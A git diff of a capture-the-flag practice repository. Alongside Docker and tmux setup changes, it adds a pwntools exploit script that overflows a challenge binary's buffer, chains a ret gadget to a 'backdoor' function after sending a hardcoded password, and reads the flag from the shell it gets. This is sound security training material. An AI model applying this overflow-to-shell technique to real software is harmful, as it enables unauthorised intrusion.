diff --git a/README.md b/README.md index a254c5d..8ffca12 100644 --- a/README.md +++ b/README.md @@ -16,4 +16,14 @@ There is also a whole playlist using challenges from https://exploit.education. # More Docker Videos - [How Docker Works - Intro to Namespaces](https://www.youtube.com/watch?v=-YnMr1lj4Z8) -- [Deepdive Containers - Kernel Sources and nsenter](https://www.youtube.com/watch?v=sHp0Q3rvamk) \ No newline at end of file +- [Deepdive Containers - Kernel Sources and nsenter](https://www.youtube.com/watch?v=sHp0Q3rvamk) + +# Improvement + +Build the ctf container(s), and start with ```docker run --rm -it -v `pwd`:/home/pwntools pwn tmux``` (Credits for the great and simple Dockerfile, tmux config and geff for pwn: https://github.com/Z6543/hackersuli_pwntools) +If you run the containers on remote vps, you can use code-server to edit the code in you browser: ```docker run -it --rm --name code-server -d -p 8081:8080 \ + -v "`pwd`/.vs-config:/root/.config" \ + -v "`pwd`:/home/coder/project" \ + -u "$(id -u):$(id -g)" \ + -e "DOCKER_USER=$USER" \ + codercom/code-server:latest``` diff --git a/challenge/.gdbinit b/challenge/.gdbinit new file mode 100644 index 0000000..ed36aa6 --- /dev/null +++ b/challenge/.gdbinit @@ -0,0 +1 @@ +source /home/pwntools/.gdbinit-gef.py diff --git a/challenge/.tmux.conf b/challenge/.tmux.conf new file mode 100644 index 0000000..9c28eb4 --- /dev/null +++ b/challenge/.tmux.conf @@ -0,0 +1,3 @@ +set -g mouse on +set -g default-shell /bin/bash +PS1="\u@\h:\w \$ " diff --git a/challenge/Dockerfile b/challenge/Dockerfile index 2fe0953..480d242 100644 --- a/challenge/Dockerfile +++ b/challenge/Dockerfile @@ -1,7 +1,7 @@ # sudo docker build -t system_health_check . # sudo docker run -d -p 1024:1024 --rm -it system_health_check -FROM ubuntu:19.10 +FROM ubuntu:20.04 RUN apt-get update diff --git a/challenge/exploit_sol.py b/challenge/exploit_sol.py new file mode 100644 index 0000000..7905851 --- /dev/null +++ b/challenge/exploit_sol.py @@ -0,0 +1,76 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# This exploit template was generated via: +# $ pwn template --host 192.168.88.33 --port 1024 +from pwn import * + +os.environ['XDG_CACHE_HOME'] = '/tmp' # some docker glitch fix + +# Set up pwntools for the correct architecture +context.update(arch='i386') +exe = context.binary = ELF('system_health_check') +context.terminal = ['tmux','splitw','-h'] + +# Many built-in settings can be controlled on the command-line and show up +# in "args". For example, to dump all data sent/received, and disable ASLR +# for all created processes... +# ./exploit.py DEBUG NOASLR +# ./exploit.py GDB HOST=example.com PORT=4141 +host = args.HOST or '192.168.88.33' +port = int(args.PORT or 1024) + +def start_local(argv=[], *a, **kw): + '''Execute the target binary locally''' + if args.GDB: + return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) + else: + return process([exe.path] + argv, *a, **kw) + +def start_remote(argv=[], *a, **kw): + '''Connect to the process on the remote host''' + io = connect(host, port) + if args.GDB: + gdb.attach(io, gdbscript=gdbscript) + return io + +def start(argv=[], *a, **kw): + '''Start the exploit against the target.''' + if args.LOCAL: + return start_local(argv, *a, **kw) + else: + return start_remote(argv, *a, **kw) + +# Specify your GDB script here for debugging +# GDB will be launched if the exploit is run via e.g. +# ./exploit.py GDB +gdbscript = ''' +continue +'''.format(**locals()) + +#=========================================================== +# EXPLOIT GOES HERE +#=========================================================== + +padding = b"A"*cyclic_find("acla") +payload = padding + + +io = start() + +# MOVAPS issue +rop = ROP(exe) +ret_gadget = rop.ret +print(ret_gadget.address) +payload += p64(ret_gadget.address) + +payload += p64(exe.symbols["backdoor"]) + + +io.clean() +# payload = cyclic(0xff+0xf) # find padding +io.sendline(b"sUp3r_S3cr3T_P4s5w0rD\x00"+payload) +io.recv(timeout = 2) +io.sendline("cat flag\n") +io.interactive() + + diff --git a/ctf/Dockerfile b/ctf/Dockerfile index f9f7809..b2ba04d 100644 --- a/ctf/Dockerfile +++ b/ctf/Dockerfile @@ -1,21 +1,4 @@ -# docker build -t ctf:ubuntu19.10 . -# If using Windows - # docker run --rm -v %cd%:/pwd --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -d --name ctf -i ctf:ubuntu19.10 -# If using Linux - # docker run --rm -v $PWD:/pwd --cap-add=SYS_PTRACE --security-opt seccomp=unconfined -d --name ctf -i ctf:ubuntu19.10 -# docker exec -it ctf /bin/bash +FROM pwntools/pwntools:latest -FROM ubuntu:19.10 -ENV LC_CTYPE C.UTF-8 -ENV DEBIAN_FRONTEND=noninteractive -RUN dpkg --add-architecture i386 && \ -apt-get update && \ -apt-get install -y build-essential jq strace ltrace curl wget rubygems gcc dnsutils netcat gcc-multilib net-tools vim gdb gdb-multiarch python python3 python3-pip python3-dev libssl-dev libffi-dev wget git make procps libpcre3-dev libdb-dev libxt-dev libxaw7-dev python-pip libc6:i386 libncurses5:i386 libstdc++6:i386 && \ -pip install capstone requests pwntools r2pipe && \ -pip3 install pwntools keystone-engine unicorn capstone ropper && \ -mkdir tools && cd tools && \ -git clone https://github.com/JonathanSalwan/ROPgadget && \ -git clone https://github.com/radare/radare2 && cd radare2 && sys/install.sh && \ -cd .. && git clone https://github.com/pwndbg/pwndbg && cd pwndbg && git checkout stable && ./setup.sh && \ -cd .. && git clone https://github.com/niklasb/libc-database && cd libc-database && ./get && \ -gem install one_gadget +RUN sudo apt update +RUN sudo apt install -y gdb net-tools gdbserver tmux netcat